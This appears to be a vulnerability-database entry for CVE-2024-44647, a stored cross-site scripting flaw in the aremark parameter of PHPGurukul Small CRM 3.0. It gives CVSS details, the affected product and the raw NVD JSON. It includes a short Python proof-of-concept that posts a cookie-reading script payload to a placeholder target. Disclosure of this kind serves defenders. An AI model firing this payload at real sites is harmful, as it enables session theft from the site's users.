Security Vulnerability Report
中文
CVE-2024-44647 CVSS 6.1 MEDIUM

CVE-2024-44647

Published: 2025-11-17 17:15:46
Last Modified: 2025-11-19 13:11:35

Description

PHPGurukul Small CRM 3.0 is vulnerable to Cross Site Scripting (XSS) via the aremark parameter in manage-tickets.php.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:phpgurukul:small_crm:3.0:*:*:*:*:*:*:* - VULNERABLE
PHPGurukul Small CRM 3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-44647 XSS PoC for PHPGurukul Small CRM 3.0 # Target: manage-tickets.php aremark parameter target_url = "http://target-website.com/small-crm/manage-tickets.php" # Malicious XSS payload xss_payload = "<script>alert(document.cookie)</script>" # PoC HTTP POST request data = { 'aremark': xss_payload, # Add other required form parameters 'submit': 'submit' } print(f"[*] Sending XSS payload to: {target_url}") print(f"[*] Payload: {xss_payload}") try: response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully") print("[*] Payload should be stored and executed when viewed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-44647", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:46.053", "lastModified": "2025-11-19T13:11:35.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PHPGurukul Small CRM 3.0 is vulnerable to Cross Site Scripting (XSS) via the aremark parameter in manage-tickets.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:small_crm:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "7E5041FC-F03B-4093-9FA3-33F2158A41C9"}]}]}], "references": [{"url": "https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44647.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/small-crm-php/", "source": "[email protected]", "tags": ["Product"]}]}}